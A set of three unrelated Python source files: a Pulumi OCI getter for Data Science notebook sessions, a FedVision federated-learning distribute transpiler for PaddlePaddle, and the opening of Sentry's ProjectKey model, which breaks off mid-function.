@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Mapping[str, Any]:
"""
Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter
def id(self) -> str:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> str:
"""
Details about the state of the notebook session.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="notebookSessionConfigurationDetails")
def notebook_session_configuration_details(self) -> 'outputs.GetNotebookSessionNotebookSessionConfigurationDetailsResult':
"""
Details for the notebook session configuration.
"""
return pulumi.get(self, "notebook_session_configuration_details")
@property
@pulumi.getter(name="notebookSessionId")
def notebook_session_id(self) -> str:
return pulumi.get(self, "notebook_session_id")
@property
@pulumi.getter(name="notebookSessionUrl")
def notebook_session_url(self) -> str:
"""
The URL to interact with the notebook session.
"""
return pulumi.get(self, "notebook_session_url")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> str:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the project associated with the notebook session.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> str:
"""
The state of the notebook session.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> str:
"""
The date and time the resource was created in the timestamp format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: 2019-08-25T21:10:29.41Z
"""
return pulumi.get(self, "time_created")
class AwaitableGetNotebookSessionResult(GetNotebookSessionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNotebookSessionResult(
compartment_id=self.compartment_id,
created_by=self.created_by,
defined_tags=self.defined_tags,
display_name=self.display_name,
freeform_tags=self.freeform_tags,
id=self.id,
lifecycle_details=self.lifecycle_details,
notebook_session_configuration_details=self.notebook_session_configuration_details,
notebook_session_id=self.notebook_session_id,
notebook_session_url=self.notebook_session_url,
project_id=self.project_id,
state=self.state,
time_created=self.time_created)
def get_notebook_session(notebook_session_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNotebookSessionResult:
"""
This data source provides details about a specific Notebook Session resource in Oracle Cloud Infrastructure Data Science service.
Gets the specified notebook session's information.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_notebook_session = oci.datascience.get_notebook_session(notebook_session_id=oci_datascience_notebook_session["test_notebook_session"]["id"])
```
:param str notebook_session_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the notebook session.
"""
__args__ = dict()
__args__['notebookSessionId'] = notebook_session_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('oci:datascience/getNotebookSession:getNotebookSession', __args__, opts=opts, typ=GetNotebookSessionResult).value
return AwaitableGetNotebookSessionResult(
compartment_id=__ret__.compartment_id,
created_by=__ret__.created_by,
defined_tags=__ret__.defined_tags,
display_name=__ret__.display_name,
freeform_tags=__ret__.freeform_tags,
id=__ret__.id,
lifecycle_details=__ret__.lifecycle_details,
notebook_session_configuration_details=__ret__.notebook_session_configuration_details,
notebook_session_id=__ret__.notebook_session_id,
notebook_session_url=__ret__.notebook_session_url,
project_id=__ret__.project_id,
state=__ret__.state,
time_created=__ret__.time_created)
|
<reponame>owlet42/FedVision
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import collections
import sys
import six
from paddle.fluid import core, framework
from paddle.fluid.distribute_lookup_table import find_distributed_lookup_table
from paddle.fluid.framework import (
Program,
default_main_program,
default_startup_program,
Parameter,
)
from paddle.fluid.transpiler.distribute_transpiler import (
DistributeTranspilerConfig,
slice_variable,
)
from .details import UnionFind, VarsDistributed
from .details import delete_ops
from .details.ps_dispatcher import RoundRobin, PSDispatcher
LOOKUP_TABLE_TYPE = "lookup_table"
LOOKUP_TABLE_GRAD_TYPE = "lookup_table_grad"
OP_ROLE_VAR_ATTR_NAME = core.op_proto_and_checker_maker.kOpRoleVarAttrName()
RPC_OP_ROLE_ATTR_NAME = (
op_role_attr_name
) = core.op_proto_and_checker_maker.kOpRoleAttrName()
OPT_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.Optimize
RPC_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.RPC
DIST_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.Dist
LR_SCHED_OP_ROLE_ATTR_VALUE = core.op_proto_and_checker_maker.OpRole.LRSched
PRINT_LOG = False
def log(*args):
if PRINT_LOG:
print(args)
def same_or_split_var(p_name, var_name):
return p_name == var_name or p_name.startswith(var_name + ".block")
class FLDistributeTranspiler(object):
"""
**FlDistributeTranspiler**
Convert the fluid program to distributed data-parallelism programs.
In pserver mode, the trainers' main program do forward, backward and optimizaiton.
pserver's main_program will sum and scale.
Examples:
.. code-block:: python
x = fluid.layers.data(name='x', shape=[13], dtype='float32')
y = fluid.layers.data(name='y', shape=[1], dtype='float32')
y_predict = fluid.layers.fc(input=x, size=1, act=None)
cost = fluid.layers.square_error_cost(input=y_predict, label=y)
avg_loss = fluid.layers.mean(cost)
sgd_optimizer = fluid.optimizer.SGD(learning_rate=0.001)
sgd_optimizer.minimize(avg_loss)
# for pserver mode
pserver_endpoints = "192.168.0.1:6174,192.168.0.2:6174"
trainer_endpoints = "192.168.0.1:6174,192.168.0.2:6174"
current_endpoint = "192.168.0.1:6174"
trainer_id = 0
trainers = 4
role = "PSERVER"
t = fluid.FlDistributeTranspiler()
t.transpile(
trainer_id, pservers=pserver_endpoints, trainers=trainers)
if role == "PSERVER":
pserver_program = t.get_pserver_program(current_endpoint)
pserver_startup_program = t.get_startup_program(current_endpoint,
pserver_program)
elif role == "TRAINER":
trainer_program = t.get_trainer_program()
"""
def __init__(self, config=None):
if config is not None:
self.config = config
else:
self.config = DistributeTranspilerConfig()
if self.config.split_method is None:
self.config.split_method = RoundRobin
global PRINT_LOG
if self.config.print_log:
PRINT_LOG = True
assert self.config.min_block_size >= 8192
assert self.config.split_method.__bases__[0] == PSDispatcher
def _get_all_remote_sparse_update_op(self, main_program):
sparse_update_ops = []
sparse_update_op_types = ["lookup_table", "nce", "hierarchical_sigmoid"]
for op in main_program.global_block().ops:
if op.type in sparse_update_op_types and op.attr("remote_prefetch") is True:
sparse_update_ops.append(op)
return sparse_update_ops
def transpile(
self,
trainer_id,
program=None,
pservers="127.0.0.1:6174",
trainers=1,
sync_mode=True,
startup_program=None,
current_endpoint="127.0.0.1:6174",
):
"""
Run the transpiler. Transpile the input program.
Args:
trainer_id (int): id for current trainer worker, if you have
n workers, the id may range from 0 ~ n-1
program (Program|None): program to transpile,
default is fluid.default_main_program().
startup_program (Program|None): startup_program to transpile,
default is fluid.default_startup_program().
pservers (str): comma separated ip:port string for the pserver
list.
trainers (int|str): in pserver mode this is the number of
trainers.
sync_mode (bool): Do sync training or not, default is True.
startup_program (Program|None): startup_program to transpile,
default is fluid.default_main_program().
current_endpoint (str): In pserver mode
this argument is not used.
Examples:
.. code-block:: python
transpiler = fluid.DistributeTranspiler()
t.transpile(
trainer_id=0,
pservers="127.0.0.1:7000,127.0.0.1:7001",
trainers=2,
sync_mode=False,
current_endpoint="127.0.0.1:7000")
"""
if program is None:
program = default_main_program()
if startup_program is None:
startup_program = default_startup_program()
self.origin_program = program
self.startup_program = startup_program
self.origin_startup_program = self.startup_program.clone()
self.trainer_num = trainers
self.sync_mode = sync_mode
self.trainer_id = trainer_id
pserver_endpoints = pservers.split(",")
self.pserver_endpoints = pserver_endpoints
self.vars_overview = VarsDistributed()
self.optimize_ops, self.params_grads = self._get_optimize_pass()
ps_dispatcher = self.config.split_method(self.pserver_endpoints)
self.table_name = find_distributed_lookup_table(self.origin_program)
self.has_distributed_lookup_table = self.table_name != None
self.param_name_to_grad_name = dict()
self.grad_name_to_param_name = dict()
for param_var, grad_var in self.params_grads:
self.param_name_to_grad_name[param_var.name] = grad_var.name
self.grad_name_to_param_name[grad_var.name] = param_var.name
# get all sparse update ops
self.sparse_update_ops = self._get_all_remote_sparse_update_op(
self.origin_program
)
# use_sparse_update_param_name -> split_height_section
self.sparse_param_to_height_sections = dict()
# add distributed attrs to program
self.origin_program._is_distributed = True
self.origin_program._endpoints = self.pserver_endpoints
self.origin_program._ps_endpoint = current_endpoint
self.origin_program._is_chief = self.trainer_id == 0
self.origin_program._distributed_lookup_table = (
self.table_name if self.table_name else None
)
# split and create vars, then put splited vars in dicts for later use.
# step 1: split and create vars, then put splited vars in dicts for later use.
self._init_splited_vars()
# step 2: insert send op to send gradient vars to parameter servers
ps_dispatcher.reset()
send_vars = []
# in general cases, the number of pservers is times of 2, and this
# will lead to uneven distribution among weights and bias:
# fc_w@GRAD_trainer_0, fc_w@GRAD_trainer_1 --> pserver1
# fc_b@GRAD_trainer_0, fc_b@GRAD_trainer_1 --> pserver2
# shuffle the map will avoid the uneven distribution above
self.opti_name_to_send_dummy_out = dict()
self.recv_program = self.origin_program.clone()
all_ops = []
for op in self.recv_program.global_block().ops:
all_ops.append(op)
delete_ops(self.recv_program.global_block(), all_ops)
self.split_num = len(program.global_block().ops)
for opti_varname in self._opti_var_list:
opti_var = program.global_block().var(opti_varname)
eplist = ps_dispatcher.dispatch([opti_var])
dummy_output = program.global_block().create_var(
name=framework.generate_control_dev_var_name()
)
self.opti_name_to_send_dummy_out[opti_varname] = dummy_output
program.global_block().append_op(
type="send",
inputs={"X": [opti_var]},
outputs={"Out": dummy_output},
attrs={
"epmap": eplist,
RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
OP_ROLE_VAR_ATTR_NAME: [
self._opti_to_param[opti_varname],
opti_varname,
],
"sync_mode": not self.sync_mode,
},
)
send_vars.append(opti_var)
if self.sync_mode:
send_barrier_out = program.global_block().create_var(
name=framework.generate_control_dev_var_name()
)
input_deps = list(self.opti_name_to_send_dummy_out.values())
program.global_block().append_op(
type="send_barrier",
inputs={"X": list(input_deps)},
outputs={"Out": send_barrier_out},
attrs={
"endpoints": pserver_endpoints,
"sync_mode": self.sync_mode,
"trainer_id": self.trainer_id,
RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
},
)
# step 3: insert recv op to receive parameters from parameter server
recv_vars = []
for _, var in enumerate(send_vars):
recv_vars.append(program.global_block().var(self._opti_to_param[var.name]))
ps_dispatcher.reset()
eplist = ps_dispatcher.dispatch(recv_vars)
for i, ep in enumerate(eplist):
self.param_grad_ep_mapping[ep]["params"].append(recv_vars[i])
self.param_grad_ep_mapping[ep]["opti"].append(send_vars[i])
distributed_var = self.vars_overview.get_distributed_var_by_slice(
recv_vars[i].name
)
distributed_var.endpoint = ep
# step4: Concat the parameters splits together after recv.
all_recv_outputs = []
for opti_varname in self._opti_var_list:
opti_var = program.global_block().var(opti_varname)
param_varname = self._opti_to_param[opti_varname]
param_var = program.global_block().var(param_varname)
eps = []
table_names = []
index = [v.name for v in recv_vars].index(param_varname)
eps.append(eplist[index])
table_names.append(var.name)
if self.sync_mode:
recv_dep_in = send_barrier_out
# get recv op_role_var, if not splited, the grad should have .trainer suffix
# if splited, grad should be the original grad var name. ParallelExecutor
# will use op_role_var to get expected device place to run this op.
all_recv_outputs.extend([param_var])
self.recv_program.global_block().append_op(
type="recv",
inputs={"X": []},
outputs={"Out": [param_var]},
attrs={
"epmap": eps,
"trainer_id": self.trainer_id,
RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
OP_ROLE_VAR_ATTR_NAME: [param_varname, opti_varname],
"sync_mode": not self.sync_mode,
},
)
if self.sync_mode:
# form a WAW dependency
self.recv_program.global_block()._insert_op(
index=len(self._opti_var_list),
type="fetch_barrier",
inputs={},
outputs={"Out": all_recv_outputs},
attrs={
"endpoints": pserver_endpoints,
"trainer_id": self.trainer_id,
RPC_OP_ROLE_ATTR_NAME: RPC_OP_ROLE_ATTR_VALUE,
},
)
self._get_trainer_startup_program(recv_vars=recv_vars, eplist=eplist)
self._get_distributed_optimizer_vars()
self.origin_program._parameters_on_pservers = self.vars_overview
def get_trainer_program(self, wait_port=True):
"""
Get transpiled trainer side program.
Returns:
Program: trainer side program.
"""
# remove optimize ops and add a send op to main_program
# FIXME(typhoonzero): Also ops like clip_gradient, lrn_decay?
lr_ops = self._get_lr_ops()
self.origin_program.__str__()
self.send_program = self.origin_program.clone()
compute_ops = self.send_program.global_block().ops[0 : self.split_num]
delete_ops(self.send_program.global_block(), compute_ops)
send_ops = self.origin_program.global_block().ops[self.split_num :]
delete_ops(self.origin_program.global_block(), send_ops)
return self.recv_program, self.origin_program, self.send_program
def _get_trainer_startup_program(self, recv_vars, eplist):
"""
Get transpiled trainer side startup program.
Args:
recv_vars (list): Variable list to recv for current trainer_id
eplist (list): A list of strings indicating
Returns:
Program: trainer side startup program.
"""
startup_program = self.startup_program
# FIXME(gongwb): delete not need ops.
# note that: some parameter is not trainable and those ops can't be deleted.
for opti_varname in self._opti_var_list:
opti_var = self.origin_program.global_block().var(opti_varname)
param_varname = self._opti_to_param[opti_varname]
var = self.origin_program.global_block().var(param_varname)
# Get the eplist of recv vars
eps = []
table_names = []
index = [v.name for v in recv_vars].index(param_varname)
eps.append(eplist[index])
return startup_program
def get_pserver_program(self, endpoint):
"""
Get parameter server side program.
Args:
endpoint (str): current parameter server endpoint.
Returns:
Program: the program for current parameter server to run.
"""
# TODO(panyx0718): Revisit this assumption. what if #blocks > #pservers.
# NOTE: assume blocks of the same variable is not distributed
# on the same pserver, only change param/grad varnames for
# trainers to fetch.
sys.stderr.write(
"get_pserver_program() is deprecated, call get_pserver_programs() to get pserver main and startup in a single call.\n"
)
# step1
pserver_program = Program()
pserver_program.random_seed = self.origin_program.random_seed
pserver_program._copy_dist_param_info_from(self.origin_program)
# step2: Create vars to receive vars at parameter servers.
recv_inputs = []
for v in self.param_grad_ep_mapping[endpoint]["params"]:
self._clone_var(pserver_program.global_block(), v)
for v in self.param_grad_ep_mapping[endpoint]["opti"]:
# create vars for each trainer in global scope, so
# we don't need to create them when grad arrives.
# change client side var name to origin name by
# removing ".trainer_%d" suffix
suff_idx = v.name.find(".opti.trainer_")
if suff_idx >= 0:
orig_var_name = v.name[:suff_idx]
# NOTE: single_trainer_var must be created for multi-trainer
# case to merge grads from multiple trainers
single_trainer_var = pserver_program.global_block().var(orig_var_name)
if self.sync_mode and self.trainer_num > 1:
for trainer_id in range(self.trainer_num):
var = pserver_program.global_block().create_var(
name="%s.opti.trainer_%d" % (orig_var_name, trainer_id),
persistable=False,
type=v.type,
dtype=v.dtype,
shape=v.shape,
)
recv_inputs.append(var)
# step 3
# Create a union-find data structure from optimize ops,
# If two ops are connected, we could add these two ops
# into one set.
ufind = self._create_ufind(self.optimize_ops)
# step 3.2
# Iterate through the ops and append optimize op which
# located on current pserver
opt_op_on_pserver = []
for _, op in enumerate(self.optimize_ops):
if self._is_optimizer_op(op) and self._is_opt_op_on_pserver(endpoint, op):
opt_op_on_pserver.append(op)
# step 3.4
# Iterate through the ops, and if an op and the optimize ops
# which located on current pserver are in one set, then
# append it into the sub program.
global_ops = []
# sparse grad name to param name
sparse_grad_to_param = []
# append lr decay ops to the child block if exists
lr_ops = self._get_lr_ops()
# record optimize blocks and we can run them on pserver parallel
opti_blocks = []
# append op to the current block
grad_to_block_id = []
pre_block_idx = pserver_program.num_blocks - 1
for idx, opt_op in enumerate(self._opti_var_list):
per_opt_block = pserver_program._create_block(pre_block_idx)
opti_blocks.append(per_opt_block)
optimize_target_param_name = self._opti_to_param[opt_op]
pserver_block = per_opt_block.program.global_block()
# append grad merging ops before clip and weight decay
# e.g. merge grad -> L2Decay op -> clip op -> optimize
merged_var = pserver_block.vars[optimize_target_param_name]
if self.sync_mode and self.trainer_num > 1:
vars2merge = []
for i in range(self.trainer_num):
per_trainer_name = "%s.opti.trainer_%d" % (
optimize_target_param_name,
i,
)
vars2merge.append(pserver_block.vars[per_trainer_name])
per_opt_block.append_op(
type="sum",
inputs={"X": vars2merge},
outputs={"Out": merged_var},
attrs={"use_mkldnn": False},
)
per_opt_block.append_op(
type="scale",
inputs={"X": merged_var},
outputs={"Out": merged_var},
attrs={"scale": 1.0 / float(self.trainer_num)},
)
# In some case, some parameter server will have no parameter to optimize
# So we give an empty optimize block to parameter server.
attrs = {
"optimize_blocks": opti_blocks,
"endpoint": endpoint,
"Fanin": self.trainer_num,
"sync_mode": self.sync_mode,
}
# step5 append the listen_and_serv op
pserver_program.global_block().append_op(
type="fl_listen_and_serv",
inputs={"X": recv_inputs},
outputs={},
attrs=attrs,
)
pserver_program._sync_with_cpp()
# save pserver program to generate pserver side startup relatively.
self.pserver_program = pserver_program
return pserver_program
def get_startup_program(self, endpoint, pserver_program=None, startup_program=None):
"""
**Deprecated**
Get startup program for current parameter server.
Modify operator input variables if there are variables that
were split to several blocks.
Args:
endpoint (str): current pserver endpoint.
pserver_program (Program): deprecated, call get_pserver_program first.
startup_program (Program): deprecated, should pass startup_program
when initalizing
Returns:
Program: parameter server side startup program.
"""
s_prog = Program()
orig_s_prog = self.startup_program
s_prog.random_seed = orig_s_prog.random_seed
params = self.param_grad_ep_mapping[endpoint]["params"]
def _get_splited_name_and_shape(varname):
for idx, splited_param in enumerate(params):
pname = splited_param.name
if same_or_split_var(pname, varname) and varname != pname:
return pname, splited_param.shape
return "", []
# 1. create vars in pserver program to startup program
pserver_vars = pserver_program.global_block().vars
created_var_map = collections.OrderedDict()
for _, var in six.iteritems(pserver_vars):
tmpvar = s_prog.global_block()._clone_variable(var)
created_var_map[var.name] = tmpvar
# 2. rename op outputs
for op in orig_s_prog.global_block().ops:
new_outputs = collections.OrderedDict()
# do not append startup op if var is not on this pserver
op_on_pserver = False
# TODO(gongwb): remove this line.
if op.type not in ["recv", "fetch_barrier", "concat"]:
for key in op.output_names:
newname, _ = _get_splited_name_and_shape(op.output(key)[0])
if newname:
op_on_pserver = True
new_outputs[key] = created_var_map[newname]
elif op.output(key)[0] in pserver_vars:
op_on_pserver = True
new_outputs[key] = pserver_vars[op.output(key)[0]]
if op_on_pserver:
# most startup program ops have no inputs
new_inputs = self._get_input_map_from_op(pserver_vars, op)
if op.type in [
"gaussian_random",
"fill_constant",
"uniform_random",
"truncated_gaussian_random",
]:
op._set_attr("shape", list(new_outputs["Out"].shape))
s_prog.global_block().append_op(
type=op.type,
inputs=new_inputs,
outputs=new_outputs,
attrs=op.all_attrs(),
)
return s_prog
# ====================== private transpiler functions =====================
def _get_slice_var_info(self, slice_var):
block_suffix = "block"
block_idx = 0
offset = 0
is_slice = False
orig_var_name, block_name, _ = self._get_varname_parts(slice_var.name)
if not block_name:
return is_slice, block_idx, offset
def _get_distributed_optimizer_vars(self):
def _get_distributed_optimizer_var(endpoint):
opt_op_on_pserver = []
for _, op in enumerate(self.optimize_ops):
if self._is_optimizer_op(op) and self._is_opt_op_on_pserver(
endpoint, op
):
opt_op_on_pserver.append(op)
for opt_op in opt_op_on_pserver:
dist_var = None
for key in opt_op.input_names:
if key == "Param":
param_name = opt_op.input(key)[0]
dist_var = (
self.vars_overview.get_distributed_var_by_origin_and_ep(
param_name, endpoint
)
)
break
for key in opt_op.input_names:
if key in ["Param", "Grad", "LearningRate"]:
continue
for ep in self.pserver_endpoints:
_get_distributed_optimizer_var(ep)
def _update_dist_lookup_table_vars(self, param_list, grad_list, params_grads):
# TODO(wuyi): put find a way to put dist lookup table stuff all together.
# update self.table_param_grad and self.trainer_side_table_grad_list
program = self.origin_program
return param_list, grad_list
def _init_splited_vars(self):
# update these mappings for further transpile:
# 1. param_var_mapping: param var name -> [splited params vars]
# 2. grad_var_mapping: grad var name -> [splited grads vars]
# 3. grad_param_mapping: grad.blockx -> param.blockx
# 4. param_grad_ep_mapping: ep -> {"params": [], "grads": []}
param_list = []
grad_list = []
param_grad_set = set()
for p, g in self.params_grads:
# skip parameter marked not trainable
if type(p) == Parameter and p.trainable == False:
continue
if p.name not in param_grad_set:
param_list.append(p)
param_grad_set.add(p.name)
if g.name not in param_grad_set:
grad_list.append(g)
param_grad_set.add(g.name)
# To do : consider lookup table later
param_list, grad_list = self._update_dist_lookup_table_vars(
param_list, grad_list, self.params_grads
)
if self.config.slice_var_up:
# when we slice var up into blocks, we will slice the var according to
# pserver services' count. A pserver may have two or more listening ports.
grad_blocks = slice_variable(
grad_list, len(self.pserver_endpoints), self.config.min_block_size
)
param_blocks = slice_variable(
param_list, len(self.pserver_endpoints), self.config.min_block_size
)
assert len(grad_blocks) == len(param_blocks)
# origin_param_name -> [splited_param_vars]
self.param_var_mapping = self._create_vars_from_blocklist(
self.origin_program, param_blocks
)
for orig_name, splited_vars in self.param_var_mapping.items():
orig_var = self.origin_program.global_block().var(orig_name)
for splited_var in splited_vars:
is_slice, block_id, offset = self._get_slice_var_info(splited_var)
self.vars_overview.add_distributed_var(
origin_var=orig_var,
slice_var=splited_var,
block_id=block_id,
offset=offset,
is_slice=is_slice,
vtype="Param",
)
# origin_grad_name -> [splited_grad_vars]
self.grad_var_mapping = self._create_vars_from_blocklist(
self.origin_program, grad_blocks
)
# add_trainer_suffix=self.trainer_num > 1)
# dict(grad_splited_var -> param_splited_var)
self.grad_param_mapping = collections.OrderedDict()
for g, p in zip(grad_blocks, param_blocks):
g_name, g_bid, _ = g.split(":")
p_name, p_bid, _ = p.split(":")
self.grad_param_mapping[
self.grad_var_mapping[g_name][int(g_bid)]
] = self.param_var_mapping[p_name][int(p_bid)]
# create mapping of endpoint -> split var to create pserver side program
self.param_grad_ep_mapping = collections.OrderedDict()
[
self.param_grad_ep_mapping.update({ep: {"params": [], "opti": []}})
for ep in self.pserver_endpoints
]
opti_list = []
opti_to_param = dict()
param_to_opti = dict()
for op in self.optimize_ops:
if (op.type == "sgd") or (op.type == "adam") or (op.type == "momentum"):
origin_name = op.output("ParamOut")
var = self.origin_program.global_block().var(origin_name[0])
new_var_name = "%s.opti.trainer_%d" % (origin_name[0], self.trainer_id)
self.origin_program.global_block().create_var(
name=new_var_name,
persistable=True,
shape=var.shape,
dtype=var.dtype,
type=var.type,
lod_level=var.lod_level,
)
new_var = self.origin_program.global_block().var(new_var_name)
opti_list.append(new_var.name)
opti_to_param[new_var.name] = var.name
param_to_opti[var.name] = new_var.name
self.origin_program.global_block().append_op(
type="scale",
inputs={"X": var},
outputs={"Out": new_var},
attrs={"scale": 1.0},
)
self._param_to_opti = param_to_opti
self._opti_to_param = opti_to_param
self._opti_var_list = opti_list
def _create_vars_from_blocklist(
self, program, block_list, add_trainer_suffix=False
):
"""
Create vars for each split.
NOTE: only grads need to be named for different trainers, use
add_trainer_suffix to rename the grad vars.
Args:
program (ProgramDesc): ProgramDesc which gradients blong.
block_list (list[(varname, block_id, block_size)]): List of gradient blocks.
add_trainer_suffix (Bool): Add trainer suffix to new variable's name if set True.
Returns:
var_mapping (collections.OrderedDict(varname->[new_varname_variable])):A dict mapping
from original var name to each var split.
"""
# varname->[(block_id, current_block_size)]
block_map = collections.OrderedDict()
var_mapping = collections.OrderedDict()
for block_str in block_list:
varname, offset, size = block_str.split(":")
if varname not in block_map:
block_map[varname] = []
block_map[varname].append((int(offset), int(size)))
for varname, splited in six.iteritems(block_map):
orig_var = program.global_block().var(varname)
if len(splited) == 1:
var_mapping[varname] = [program.global_block().var(orig_var.name)]
continue
return var_mapping
def _clone_var(self, block, var, persistable=True):
return block.create_var(
name=var.name,
shape=var.shape,
dtype=var.dtype,
type=var.type,
lod_level=var.lod_level,
persistable=persistable,
)
def _get_varname_parts(self, varname):
# returns origin, blockid, trainerid
orig_var_name = ""
trainer_part = ""
block_part = ""
trainer_idx = varname.find(".trainer_")
if trainer_idx >= 0:
trainer_part = varname[trainer_idx + 1 :]
else:
trainer_idx = len(varname)
block_index = varname.find(".block")
if block_index >= 0:
block_part = varname[block_index + 1 : trainer_idx]
else:
block_index = len(varname)
orig_var_name = varname[0 : min(block_index, trainer_idx)]
return orig_var_name, block_part, trainer_part
def _is_op_connected(self, op1, op2):
# If one op's input is another op's output or
# one op's output is another op's input, we say
# the two operator is connected.
if set(op1.desc.output_arg_names()) & set(op2.desc.input_arg_names()) or set(
op1.desc.input_arg_names()
) & set(op2.desc.output_arg_names()):
return True
return False
def _create_ufind(self, optimize_ops):
# Create a unit find data struct by optimize ops
ufind = UnionFind(optimize_ops)
for i in range(len(optimize_ops)):
for j in range(i, len(optimize_ops)):
op1 = optimize_ops[i]
op2 = optimize_ops[j]
if self._is_op_connected(op1, op2):
ufind.union(op1, op2)
return ufind
def _is_optimizer_op(self, op):
if "Param" in op.input_names and "LearningRate" in op.input_names:
return True
return False
def _is_opt_op_on_pserver(self, endpoint, op):
param_names = [p.name for p in self.param_grad_ep_mapping[endpoint]["params"]]
if op.input("Param")[0] in param_names:
return True
def _get_input_map_from_op(self, varmap, op):
"""Returns a dict from op input name to the vars in varmap."""
iomap = collections.OrderedDict()
return iomap
def _get_lr_ops(self):
lr_ops = []
block = self.origin_program.global_block()
for op in block.ops:
role_id = int(op.attr(RPC_OP_ROLE_ATTR_NAME))
return lr_ops
def _is_opt_role_op(self, op):
# NOTE: depend on oprole to find out whether this op is for
# optimize
op_maker = core.op_proto_and_checker_maker
optimize_role = core.op_proto_and_checker_maker.OpRole.Optimize
if op_maker.kOpRoleAttrName() in op.attr_names and int(
op.all_attrs()[op_maker.kOpRoleAttrName()]
) == int(optimize_role):
return True
return False
def _get_optimize_pass(self):
"""
Get optimizer operators, parameters and gradients from origin_program
Returns:
opt_ops (list): optimize operators.
params_grads (dict): parameter->gradient.
"""
block = self.origin_program.global_block()
opt_ops = []
params_grads = []
# tmp set to dedup
optimize_params = set()
origin_var_dict = self.origin_program.global_block().vars
for op in block.ops:
if self._is_opt_role_op(op):
opt_ops.append(op)
if op.attr(OP_ROLE_VAR_ATTR_NAME):
param_name = op.attr(OP_ROLE_VAR_ATTR_NAME)[0]
grad_name = op.attr(OP_ROLE_VAR_ATTR_NAME)[1]
if not param_name in optimize_params:
optimize_params.add(param_name)
log("adding param_grad pair: ", param_name, grad_name)
params_grads.append(
[origin_var_dict[param_name], origin_var_dict[grad_name]]
)
return opt_ops, params_grads
|
"""
sentry.models.projectkey
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import petname
import six
from bitfield import BitField
from uuid import uuid4
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from six.moves.urllib.parse import urlparse
from sentry import options
from sentry.db.models import (
Model, BaseManager, BoundedPositiveIntegerField, FlexibleForeignKey,
sane_repr
)
# TODO(dcramer): pull in enum library
class ProjectKeyStatus(object):
ACTIVE = 0
INACTIVE = 1
class ProjectKey(Model):
__core__ = True
project = FlexibleForeignKey('sentry.Project', related_name='key_set')
label = models.CharField(max_length=64, blank=True, null=True)
public_key = models.CharField(max_length=32, unique=True, null=True)
secret_key = models.CharField(max_length=32, unique=True, null=True)
roles = BitField(flags=(
# access to post events to the store endpoint
('store', 'Event API access'),
# read/write access to rest API
('api', 'Web API access'),
), default=['store'])
status = BoundedPositiveIntegerField(default=0, choices=(
(ProjectKeyStatus.ACTIVE, _('Active')),
(ProjectKeyStatus.INACTIVE, _('Inactive')),
), db_index=True)
date_added = models.DateTimeField(default=timezone.now, null=True)
objects = BaseManager(cache_fields=(
'public_key',
'secret_key',
))
# support legacy project keys in API
scopes = (
'project:read',
'project:write',
'project:delete',
'project:releases',
'event:read',
'event:write',
'event:delete',
)
class Meta:
app_label = 'sentry'
db_table = 'sentry_projectkey'
__repr__ = sane_repr('project_id', 'public_key')
def __unicode__(self):
return six.text_type(self.public_key)
@classmethod
def generate_api_key(cls):
return uuid4().hex
@classmethod
def from_dsn(cls, dsn):
urlparts = urlparse(dsn)
public_key = urlparts.username
project_id = urlparts.path.rsplit('/', 1)[-1]
try:
return ProjectKey.objects.get(
public_key=public_key,
project=project_id,
)
except ValueError:
# ValueError would come from a non-integer project_id,
# which is obviously a DoesNotExist. We catch and rethrow this
# so anything downstream expecting DoesNotExist works fine
raise ProjectKey.DoesNotExist('ProjectKey matching query does not exist.')
@classmethod
def get_default(cls, project):
try:
return cls.objects.filter(
project=project,
roles=cls.roles.store,
status=ProjectKeyStatus.ACTIVE
)[0]
except IndexError:
return None
@property
def is_active(self):
return self.status == ProjectKeyStatus.ACTIVE
def save(self, *args, **kwargs):
if not self.public_key:
self.public_key = ProjectKey.generate_api_key()
if not self.secret_key:
self.secret_key = ProjectKey.generate_api_key()
if not self.label:
self.label = petname.Generate(2, ' ').title()
super(ProjectKey, self).save(*args, **kwargs)
def get_dsn(self, domain=None, secure=True, public=False):
if not public:
key = '%s:%s' % (self.public_key, self.secret_key)
url = settings.SENTRY_ENDPOINT
else:
key = self.public_key
